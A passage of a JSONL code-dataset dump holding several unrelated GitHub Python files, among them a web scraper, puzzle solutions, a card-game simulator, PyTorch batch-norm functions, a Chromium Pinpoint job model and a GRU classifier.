TEXT, image9 TEXT\"\n \"image10 TEXT, image11 TEXT, image12 TEXT, image13 TEXT, image14 TEXT, image15 TEXT, image16 TEXT)\")\n for item in items:\n img2 = item.find('img').get('src')\n img2 = img2.replace('-1c', '-2c')\n disC = item.find('td', class_='mgray-11').get_text(strip=True)\n disC = disC.replace('\\xa0ø\\xa0', ' ')\n disC = disC.replace('Y#', ', ')\n titleC = item.find('tr', class_='marked-0').get_text(strip=True)\n image1C = item.find('img').get('src')\n image2C = img2\n\n nou = '-'\n\n cursor.execute(\"INSERT INTO query VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", (titleC, disC, image1C, image2C, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou, nou) )\n db.commit()\n\n\ndef parse():\n html = get_html(URL)\n if html.status_code == 200:\n get_content(html.text)\n pass\n else:\n print('ERROR')\nparse()\n", "repo_name": "KyklyMachine/Coins-mint", "sub_path": "Parser/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1782, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "18091324688", "text": "from itertools import combinations_with_replacement\n\n\ndef stones(n, a, b):\n scenarios = list(combinations_with_replacement([a, b], n))\n results = list()\n last_stone = 0\n for scenario in scenarios:\n for step in range(1, len(scenario)):\n last_stone += scenario[step]\n results.append(last_stone)\n last_stone = 0\n result = []\n boo = [result.append(num) for num in results if num not in result]\n return sorted(result)\n\n\nprint(stones(4, 10, 100))\n", "repo_name": "faramarz-hosseini/hackerrank-problems", "sub_path": "Manasa and Stones.py", "file_name": "Manasa and Stones.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations_with_replacement", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "36125418244", "text": "#!/usr/bin/env python\n\nfrom collections import defaultdict\nfrom functools import reduce\n\nTEST_INPUT = defaultdict(list, {\n 'c': ['a', 'f'],\n 'a': ['b', 'd'],\n 'b': ['e'],\n 'd': ['e'],\n 'f': ['e'],\n})\n\n\nREAL_INPUT = defaultdict(list, {\n 'Z': ['V', 'H', 'L', 'E', 'D', 'Y'],\n 'V': ['K', 'S', 'P'],\n 'M': ['Q', 'B', 'I', 'N', 'D', 'A', 'O', 'G'],\n 'E': ['X', 'H', 'W'],\n 'J': ['W', 'I', 'R', 'C', 'A', 'N', 'S'],\n 'L': ['O', 'W', 'T', 'X'],\n 'Q': ['T', 'S', 'G'],\n 'Y': ['P', 'X', 'C', 'D'],\n 'X': ['R', 'T', 'A', 'F', 'S'],\n 'T': ['U', 'H', 'C', 'I', 'R', 'S', 'P'],\n 'I': ['O', 'G', 'S', 'P', 'F'],\n 'P': ['H', 'N', 'R', 'W'],\n 'G': ['A', 'R', 'N', 'S', 'F'],\n 'N': ['A', 'R', 'W', 'O', 'K'],\n 'H': ['B', 'C', 'F', 'S'],\n 'F': ['D', 'A', 'C', 'W'],\n 'S': ['O', 'K', 'B'],\n 'O': ['W', 'B', 'A', 'D'],\n 'D': ['U', 'K', 'R', 'B', 'W'],\n 'W': ['B', 'C'],\n 'A': ['K', 'U', 'B'],\n 'B': ['R', 'C'],\n 'K': ['C', 'U'],\n 'R': ['C', 'U'],\n 'U': ['C'],\n})\n\ndef parse_instructions(instructions):\n input_list = defaultdict(list)\n with open(instructions, 'r') as rules:\n for rule in rules:\n r = rule.split()\n input_list[r[1]].append(r[7])\n return input_list\n\ndef find_start_points(input_list):\n start_points = []\n for i in list(input_list.keys()):\n s = list(map(lambda x: i in x, list(input_list.values())))\n r = reduce((lambda x, y: x or y), s)\n if not r:\n start_points.append(i)\n start_points.sort()\n return start_points\n\ndef has_no_deps(node, graph):\n collapsed = reduce(lambda x,y: x+y, list(graph.values()), [])\n if node not in reduce(lambda x,y: x+y, list(graph.values()), []):\n return True\n return False\n\ndef traverse_graph(start_points, graph):\n start_point = start_points.pop(0)\n path = [start_point]\n next_points = start_points\n next_points += graph.pop(start_point, [])\n while next_points:\n next_points = list(filter(lambda x: has_no_deps(x, graph), next_points))\n next_points.sort()\n if next_points:\n p = next_points.pop(0)\n path.append(p)\n n = graph.pop(p, [])\n if n:\n next_points += n\n sps = find_start_points(graph)\n if sps:\n next_points = list(set(next_points + sps))\n return path\n\ndef main(input_list):\n start_points = find_start_points(input_list)\n if start_points:\n path = traverse_graph(start_points, input_list)\n print('Path = ', ''.join(path))\n\nif __name__ == '__main__':\n instructions = 'input.dat'\n input_list = parse_instructions(instructions)\n main(TEST_INPUT)\n main(input_list)\n", "repo_name": "manishlad/adventofcode", "sub_path": "2018/07/sum_of_parts.py", "file_name": "sum_of_parts.py", "file_ext": "py", "file_size_in_byte": 2732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 44, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 55, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 62, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "37342546404", "text": "#!/usr/bin/env python\n\n\"\"\"\n\nUtilities to find IPv4/IPv6 prefixes that are \"colocated\", in the sense\nthat they are likely routed to the same physical location.\n\n\"\"\"\n\nimport json\nimport sys\n\ndef prefixes_from_asn(probes_file, asn):\n \"\"\"Given an ASN, returns a list of (IPv4 prefix, IPv6 prefix) of colocated\n prefixes originated from this ASN. It uses Atlas probes.\"\"\"\n probes = json.load(probes_file)\n interesting_probes = [probe for probe in probes['objects'] if probe['asn_v4'] == asn and probe['asn_v4'] == probe['asn_v6']]\n return set((probe['prefix_v4'], probe['prefix_v6']) for probe in interesting_probes)\n\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as probe_file:\n for pair in prefixes_from_asn(probe_file, int(sys.argv[2])):\n print(\"{}\\t{}\".format(pair[0], pair[1]))\n", "repo_name": "vgiotsas/ipv6-route-optimization", "sub_path": "as_paths/prefixes_from_probe.py", "file_name": "prefixes_from_probe.py", "file_ext": "py", "file_size_in_byte": 821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "18809143120", "text": "from random import shuffle\nfrom queue import Queue\nfrom typing import List\n\n\nclass DrunkerGeneralException(Exception):\n pass\n\n\nclass InvalidCardException(DrunkerGeneralException):\n pass\n\n\nclass PlayerOutOfCardsException(DrunkerGeneralException):\n pass\n\n\nclass Card:\n\n possible_values = ['6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n\n def __init__(self, value):\n if value in self.possible_values:\n self.value = value\n else:\n raise InvalidCardException\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __gt__(self, other):\n if self.value == '6' and other.value == 'A':\n return True\n if self.possible_values.index(self.value) > self.possible_values.index(other.value) and \\\n (self.value != 'A' or other.value != '6'):\n return True\n return False\n\n def __repr__(self):\n return self.value\n\n\nclass Deck:\n\n def __init__(self):\n self.all_deck = []\n for card_type in range(4):\n for one_card in Card.possible_values:\n self.all_deck.append(Card(one_card))\n\n def shuffle(self):\n shuffle(self.all_deck)\n\n\nclass Player:\n\n def __init__(self):\n self.hand = Queue()\n\n def move(self):\n if not self.hand.empty():\n return self.hand.get()\n else:\n raise PlayerOutOfCardsException\n\n def take(self, cards: List[Card]):\n for card in cards:\n self.hand.put(card)\n\n\nclass Game:\n\n def __init__(self, id_=1, write_log=False):\n self.game_id = id_\n self.write_log = write_log\n self.player1 = Player()\n self.player2 = Player()\n deck = Deck()\n deck.shuffle()\n self.deck = deck.all_deck\n self.deal()\n\n def deal(self):\n self.player1.take(self.deck[0:len(self.deck) // 2])\n self.player2.take(self.deck[len(self.deck) // 2:len(self.deck) + 1])\n\n def play(self):\n bank = []\n step = 0\n log_messages = []\n\n while True:\n step += 1\n\n log_messages.append(f\"Step: {step}\")\n log_messages.append(f\"Player1 hand before step {self.player1.hand.queue}\")\n log_messages.append(f\"Player2 hand before step {self.player2.hand.queue}\")\n\n try:\n card1 = self.player1.move()\n log_messages.append(f\"Player1 puts {card1}\")\n except PlayerOutOfCardsException:\n log_messages.append(\"Player1 lost the game\")\n if self.write_log and step <= 19:\n with open(f'log/game_{self.game_id}.txt', 'w') as file_:\n file_.write('\\n'.join(log_messages))\n # print(\"Player 1 has lost the game\")\n # print(f\"Game {self.game_id} finished. Steps {step}\")\n return 2, step, self.game_id\n\n try:\n card2 = self.player2.move()\n log_messages.append(f\"Player2 puts {card2}\")\n except PlayerOutOfCardsException:\n log_messages.append(\"Player 2 has lost the game\")\n if self.write_log and step <= 19:\n with open(f'log/game_{self.game_id}.txt', 'w') as file_:\n file_.write('\\n'.join(log_messages))\n # print(f\"Game {self.game_id} finished. Steps {step}\")\n return 1, step, self.game_id\n\n bank.append(card1)\n bank.append(card2)\n\n shuffle(bank)\n\n log_messages.append(f\"Bank: {bank}\")\n\n if card1 > card2:\n self.player1.take(bank)\n elif card2 > card1:\n self.player2.take(bank)\n elif card1 == card2:\n log_messages.append('Spor!')\n continue\n bank = []\n\n log_messages.append(f\"Player1 hand after step {self.player1.hand.queue}\")\n log_messages.append(f\"Player2 hand after step {self.player2.hand.queue}\")\n log_messages.append(\"-------------------------------------------------\")\n\n\nif __name__ == \"__main__\":\n\n wins = []\n steps = []\n shortest = []\n for k in range(100000):\n game = Game(id_=k, write_log=True).play()\n wins.append(game[0])\n steps.append(game[1])\n if game[1] <= 19:\n shortest.append(game[2])\n\n print(wins.count(1), wins.count(2), wins.count(3), max(steps), min(steps), sum(steps) / len(steps))\n print(f\"Short games: {shortest}\")\n", "repo_name": "Andrewkha/drunkman", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.shuffle", "line_number": 52, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 66, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "71241418085", "text": "import torch\nfrom torch.autograd import Variable, Function\nfrom .src import *\n\n__all__ = ['sum_square', 'batchnormtrain']\n\ndef sum_square(input):\n r\"\"\"Calculate sum of elements and sum of squares for Batch Normalization\"\"\"\n return _sum_square.apply(input)\n\n\nclass _sum_square(Function):\n @staticmethod\n def forward(ctx, input):\n ctx.save_for_backward(input)\n if input.is_cuda:\n xsum, xsqusum = gpu.sumsquare_forward(input)\n else:\n xsum, xsqusum = cpu.sumsquare_forward(input)\n return xsum, xsqusum\n\n @staticmethod\n def backward(ctx, gradSum, gradSquare):\n input, = ctx.saved_variables\n if input.is_cuda:\n gradInput = gpu.sumsquare_backward(input, gradSum, gradSquare)\n else:\n raise NotImplemented\n return gradInput\n\n\nclass _batchnormtrain(Function):\n @staticmethod\n def forward(ctx, input, mean, std, gamma, beta):\n ctx.save_for_backward(input, mean, std, gamma, beta)\n if input.is_cuda:\n output = gpu.batchnorm_forward(input, mean, std, gamma, beta)\n else:\n output = cpu.batchnorm_forward(input, mean, std, gamma, beta)\n return output\n\n @staticmethod\n def backward(ctx, gradOutput):\n input, mean, std, gamma, beta = ctx.saved_variables\n if gradOutput.is_cuda:\n gradInput, gradMean, gradStd, gradGamma, gradBeta = \\\n gpu.batchnorm_backward(gradOutput, input, mean,\n std, gamma, beta, True)\n else:\n raise NotImplemented\n return gradInput, gradMean, gradStd, gradGamma, gradBeta\n\n\ndef batchnormtrain(input, mean, std, gamma, beta):\n r\"\"\"Applies Batch Normalization over a 3d input that is seen as a\n mini-batch.\n\n .. _encoding.batchnormtrain:\n\n .. math::\n\n y = \\frac{x - \\mu[x]}{ \\sqrt{var[x] + \\epsilon}} * \\gamma + \\beta\n\n Shape:\n - Input: :math:`(N, C)` or :math:`(N, C, L)`\n - Output: :math:`(N, C)` or :math:`(N, C, L)` (same shape as input)\n\n \"\"\"\n return _batchnormtrain.apply(input, mean, std, gamma, beta)\n", "repo_name": "ycszen/TorchSeg", "sub_path": "furnace/legacy/sync_bn/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 2141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1396, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.autograd.Function", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.autograd.Function", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "12506534985", "text": "import datetime\nimport os\nimport sys\nimport traceback\nimport uuid\n\nfrom google.appengine.api import datastore_errors\nfrom google.appengine.api import taskqueue\nfrom google.appengine.ext import ndb\nfrom google.appengine.runtime import apiproxy_errors\n\nfrom dashboard.common import utils\nfrom dashboard.pinpoint.models import job_state\nfrom dashboard.pinpoint.models import results2\nfrom dashboard.services import issue_tracker_service\n\n\n# We want this to be fast to minimize overhead while waiting for tasks to\n# finish, but don't want to consume too many resources.\n_TASK_INTERVAL = 60\n\n\n_CRYING_CAT_FACE = u'\\U0001f63f'\n_ROUND_PUSHPIN = u'\\U0001f4cd'\n\n\nOPTION_STATE = 'STATE'\nOPTION_TAGS = 'TAGS'\n\n\nCOMPARISON_MODES = job_state.COMPARISON_MODES\n\n\ndef JobFromId(job_id):\n \"\"\"Get a Job object from its ID. Its ID is just its key as a hex string.\n\n Users of Job should not have to import ndb. This function maintains an\n abstraction layer that separates users from the Datastore details.\n \"\"\"\n job_key = ndb.Key('Job', int(job_id, 16))\n return job_key.get()\n\n\nclass Job(ndb.Model):\n \"\"\"A Pinpoint job.\"\"\"\n\n created = ndb.DateTimeProperty(required=True, auto_now_add=True)\n # Don't use `auto_now` for `updated`. When we do data migration, we need\n # to be able to modify the Job without changing the Job's completion time.\n updated = ndb.DateTimeProperty(required=True, auto_now_add=True)\n\n # The name of the Task Queue task this job is running on. If it's present, the\n # job is running. The task is also None for Task Queue retries.\n task = ndb.StringProperty()\n\n # The string contents of any Exception that was thrown to the top level.\n # If it's present, the job failed.\n exception = ndb.TextProperty()\n\n # Request parameters.\n arguments = ndb.JsonProperty(required=True)\n\n # TODO: The bug id is only used for posting bug comments when a job starts and\n # completes. This probably should not be the responsibility of Pinpoint.\n bug_id = ndb.IntegerProperty()\n\n # Email of the job creator.\n user = ndb.StringProperty()\n\n state = ndb.PickleProperty(required=True, compressed=True)\n\n tags = ndb.JsonProperty()\n\n @classmethod\n def New(cls, quests, changes, arguments=None, bug_id=None,\n comparison_mode=None, pin=None, tags=None, user=None):\n \"\"\"Creates a new Job, adds Changes to it, and puts it in the Datstore.\n\n Args:\n quests: An iterable of Quests for the Job to run.\n changes: An iterable of the initial Changes to run on.\n arguments: A dict with the original arguments used to start the Job.\n bug_id: A monorail issue id number to post Job updates to.\n comparison_mode: Either 'functional' or 'performance', which the Job uses\n to figure out whether to perform a functional or performance bisect.\n If None, the Job will not automatically add any Attempts or Changes.\n pin: A Change (Commits + Patch) to apply to every Change in this Job.\n tags: A dict of key-value pairs used to filter the Jobs listings.\n user: The email of the Job creator.\n\n Returns:\n A Job object.\n \"\"\"\n state = job_state.JobState(quests, comparison_mode=comparison_mode, pin=pin)\n job = cls(state=state, arguments=arguments or {},\n bug_id=bug_id, tags=tags, user=user)\n\n for c in changes:\n job.AddChange(c)\n\n job.put()\n return job\n\n @property\n def job_id(self):\n return '%x' % self.key.id()\n\n @property\n def status(self):\n if self.task:\n return 'Running'\n\n if self.exception:\n return 'Failed'\n\n return 'Completed'\n\n @property\n def url(self):\n return 'https://%s/job/%s' % (os.environ['HTTP_HOST'], self.job_id)\n\n def AddChange(self, change):\n self.state.AddChange(change)\n\n def Start(self):\n \"\"\"Starts the Job and updates it in the Datastore.\n\n This method is designed to return fast, so that Job creation is responsive\n to the user. It schedules the Job on the task queue without running\n anything. It also posts a bug comment, and updates the Datastore.\n \"\"\"\n self._Schedule()\n self.put()\n\n title = _ROUND_PUSHPIN + ' Pinpoint job started.'\n comment = '\\n'.join((title, self.url))\n self._PostBugComment(comment, send_email=False)\n\n def _Complete(self):\n try:\n results2.ScheduleResults2Generation(self)\n except taskqueue.Error:\n pass\n\n # Format bug comment.\n\n if not self.state.comparison_mode:\n # There is no comparison metric.\n title = \"%s Job complete. See results below.\" % _ROUND_PUSHPIN\n self._PostBugComment('\\n'.join((title, self.url)))\n return\n\n # There is a comparison metric.\n differences = tuple(self.state.Differences())\n\n if not differences:\n title = \"%s Couldn't reproduce a difference.\" % _ROUND_PUSHPIN\n self._PostBugComment('\\n'.join((title, self.url)))\n return\n\n # Include list of Changes.\n owner = None\n sheriff = None\n cc_list = set()\n commit_details = []\n for _, change in differences:\n if change.patch:\n commit_info = change.patch.AsDict()\n else:\n commit_info = change.last_commit.AsDict()\n\n # TODO: Assign the largest difference, not the last one.\n owner = commit_info['author']\n sheriff = utils.GetSheriffForAutorollCommit(commit_info)\n cc_list.add(commit_info['author'])\n commit_details.append(_FormatCommitForBug(commit_info))\n\n # Header.\n if len(differences) == 1:\n status = 'Found a significant difference after 1 commit.'\n else:\n status = ('Found significant differences after each of %d commits.' %\n len(differences))\n\n title = '%s %s' % (_ROUND_PUSHPIN, status)\n header = '\\n'.join((title, self.url))\n\n # Body.\n body = '\\n\\n'.join(commit_details)\n if sheriff:\n owner = sheriff\n body += '\\n\\nAssigning to sheriff %s because \"%s\" is a roll.' % (\n sheriff, commit_info['subject'])\n\n # Footer.\n footer = ('Understanding performance regressions:\\n'\n ' http://g.co/ChromePerformanceRegressions')\n\n # Bring it all together.\n comment = '\\n\\n'.join((header, body, footer))\n current_bug_status = self._GetBugStatus()\n if (not current_bug_status or\n current_bug_status in ['Untriaged', 'Unconfirmed', 'Available']):\n # Set the bug status and owner if this bug is opened and unowned.\n self._PostBugComment(comment, status='Assigned',\n cc_list=sorted(cc_list), owner=owner)\n else:\n # Only update the comment and cc list if this bug is assigned or closed.\n self._PostBugComment(comment, cc_list=sorted(cc_list))\n\n def Fail(self):\n self.exception = traceback.format_exc()\n\n title = _CRYING_CAT_FACE + ' Pinpoint job stopped with an error.'\n comment = '\\n'.join((title, self.url, '', sys.exc_value.message))\n self._PostBugComment(comment)\n\n def _Schedule(self):\n # Set a task name to deduplicate retries. This adds some latency, but we're\n # not latency-sensitive. If Job.Run() works asynchronously in the future,\n # we don't need to worry about duplicate tasks.\n # https://github.com/catapult-project/catapult/issues/3900\n task_name = str(uuid.uuid4())\n try:\n task = taskqueue.add(\n queue_name='job-queue', url='/api/run/' + self.job_id,\n name=task_name, countdown=_TASK_INTERVAL)\n except apiproxy_errors.DeadlineExceededError:\n task = taskqueue.add(\n queue_name='job-queue', url='/api/run/' + self.job_id,\n name=task_name, countdown=_TASK_INTERVAL)\n\n self.task = task.name\n\n def Run(self):\n \"\"\"Runs this Job.\n\n Loops through all Attempts and checks the status of each one, kicking off\n tasks as needed. Does not block to wait for all tasks to finish. Also\n compares adjacent Changes' results and adds any additional Attempts or\n Changes as needed. If there are any incomplete tasks, schedules another\n Run() call on the task queue.\n \"\"\"\n self.exception = None # In case the Job succeeds on retry.\n self.task = None # In case an exception is thrown.\n\n try:\n if self.state.comparison_mode:\n self.state.Explore()\n work_left = self.state.ScheduleWork()\n\n # Schedule moar task.\n if work_left:\n self._Schedule()\n else:\n self._Complete()\n except BaseException:\n self.Fail()\n raise\n finally:\n # Don't use `auto_now` for `updated`. When we do data migration, we need\n # to be able to modify the Job without changing the Job's completion time.\n self.updated = datetime.datetime.now()\n try:\n self.put()\n except (datastore_errors.Timeout,\n datastore_errors.TransactionFailedError):\n # Retry once.\n self.put()\n except datastore_errors.BadRequestError:\n if self.task:\n queue = taskqueue.Queue('job-queue')\n queue.delete_tasks(taskqueue.Task(name=self.task))\n self.task = None\n\n # The _JobState is too large to fit in an ndb property.\n # Load the Job from before we updated it, and fail it.\n job = self.key.get(use_cache=False)\n job.task = None\n job.Fail()\n job.updated = datetime.datetime.now()\n job.put()\n raise\n\n def AsDict(self, options=None):\n d = {\n 'job_id': self.job_id,\n\n 'arguments': self.arguments,\n 'bug_id': self.bug_id,\n 'comparison_mode': self.state.comparison_mode,\n 'user': self.user,\n\n 'created': self.created.isoformat(),\n 'updated': self.updated.isoformat(),\n 'exception': self.exception,\n 'status': self.status,\n }\n if not options:\n return d\n\n if OPTION_STATE in options:\n d.update(self.state.AsDict())\n if OPTION_TAGS in options:\n d['tags'] = {'tags': self.tags}\n return d\n\n def _PostBugComment(self, *args, **kwargs):\n if not self.bug_id:\n return\n\n issue_tracker = issue_tracker_service.IssueTrackerService(\n utils.ServiceAccountHttp())\n issue_tracker.AddBugComment(self.bug_id, *args, **kwargs)\n\n def _GetBugStatus(self):\n if not self.bug_id:\n return None\n\n issue_tracker = issue_tracker_service.IssueTrackerService(\n utils.ServiceAccountHttp())\n issue_data = issue_tracker.GetIssue(self.bug_id)\n return issue_data.get('status')\n\n\ndef _FormatCommitForBug(commit_info):\n subject = '%s by %s' % (commit_info['subject'], commit_info['author'])\n return '\\n'.join((subject, commit_info['url']))\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/catapult/dashboard/dashboard/pinpoint/models/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 10499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dashboard.pinpoint.models.job_state.COMPARISON_MODES", "line_number": 31, "usage_type": "attribute"}, {"api_name": "dashboard.pinpoint.models.job_state", "line_number": 31, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 40, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 40, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 44, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.DateTimeProperty", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.DateTimeProperty", "line_number": 50, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 50, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 54, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 54, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.TextProperty", "line_number": 58, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 58, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.JsonProperty", "line_number": 61, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 61, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.IntegerProperty", "line_number": 65, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 65, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 68, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 68, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.PickleProperty", "line_number": 70, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 70, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.JsonProperty", "line_number": 72, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 72, "usage_type": "name"}, {"api_name": "dashboard.pinpoint.models.job_state.JobState", "line_number": 94, "usage_type": "call"}, {"api_name": "dashboard.pinpoint.models.job_state", "line_number": 94, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 120, "usage_type": "attribute"}, {"api_name": "dashboard.pinpoint.models.results2.ScheduleResults2Generation", "line_number": 141, "usage_type": "call"}, {"api_name": "dashboard.pinpoint.models.results2", "line_number": 141, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Error", "line_number": 142, "usage_type": "attribute"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 142, "usage_type": "name"}, {"api_name": "dashboard.common.utils.GetSheriffForAutorollCommit", "line_number": 174, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 174, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.exc_value", "line_number": 215, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 223, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue.add", "line_number": 225, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 225, "usage_type": "name"}, {"api_name": "google.appengine.runtime.apiproxy_errors.DeadlineExceededError", "line_number": 228, "usage_type": "attribute"}, {"api_name": "google.appengine.runtime.apiproxy_errors", "line_number": 228, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.add", "line_number": 229, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 229, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 263, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 263, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors.Timeout", "line_number": 266, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 266, "usage_type": "name"}, {"api_name": "google.appengine.api.datastore_errors.TransactionFailedError", "line_number": 267, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 267, "usage_type": "name"}, {"api_name": "google.appengine.api.datastore_errors.BadRequestError", "line_number": 270, "usage_type": "attribute"}, {"api_name": "google.appengine.api.datastore_errors", "line_number": 270, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Queue", "line_number": 272, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 272, "usage_type": "name"}, {"api_name": "google.appengine.api.taskqueue.Task", "line_number": 273, "usage_type": "call"}, {"api_name": "google.appengine.api.taskqueue", "line_number": 273, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 281, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 281, "usage_type": "attribute"}, {"api_name": "dashboard.services.issue_tracker_service.IssueTrackerService", "line_number": 312, "usage_type": "call"}, {"api_name": "dashboard.services.issue_tracker_service", "line_number": 312, "usage_type": "name"}, {"api_name": "dashboard.common.utils.ServiceAccountHttp", "line_number": 313, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 313, "usage_type": "name"}, {"api_name": "dashboard.services.issue_tracker_service.IssueTrackerService", "line_number": 320, "usage_type": "call"}, {"api_name": "dashboard.services.issue_tracker_service", "line_number": 320, "usage_type": "name"}, {"api_name": "dashboard.common.utils.ServiceAccountHttp", "line_number": 321, "usage_type": "call"}, {"api_name": "dashboard.common.utils", "line_number": 321, "usage_type": "name"}]} +{"seq_id": "44436907436", "text": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass BoWGRUClassifier(nn.Module):\n \"\"\"\n Used to represent the layers our ANN will consist of together with the activation function.\n \"\"\"\n def __init__(self, input_size, hidden_dim, output_dim, n_layers, bidirectional, dropout):\n super(BoWGRUClassifier, self).__init__()\n self.rnn = nn.GRU(input_size=input_size,\n hidden_size=hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n batch_first=True,\n dropout=0 if n_layers < 2 else dropout)\n self.out = nn.Linear(hidden_dim * 2 if bidirectional else hidden_dim, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, bow_gru_matrix):\n # bow_gru_matrix = [batch size, sent len, emb dim]\n _, hidden = self.rnn(bow_gru_matrix)\n # hidden = [n layers * n directions, batch size, emb dim]\n if self.rnn.bidirectional:\n hidden = self.dropout(torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1))\n else:\n hidden = self.dropout(hidden[-1, :, :])\n # hidden = [batch size, hid dim]\n output = self.out(hidden)\n # output = [batch size, out dim]\n return output\n\n", "repo_name": "cmimprota/CSR", "sub_path": "algorithms/bow_gru/bow_gru_model.py", "file_name": "bow_gru_model.py", "file_ext": "py", "file_size_in_byte": 1342, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "10301133016", "text": "import datetime\n\nfrom django.contrib.auth.models import Group\nfrom django.utils import timezone\nfrom rest_framework.exceptions import ValidationError\n\nfrom .models import *\nfrom rest_framework import serializers\n\nclass DocumentSerializer(serializers.ModelSerializer):\n check_date = 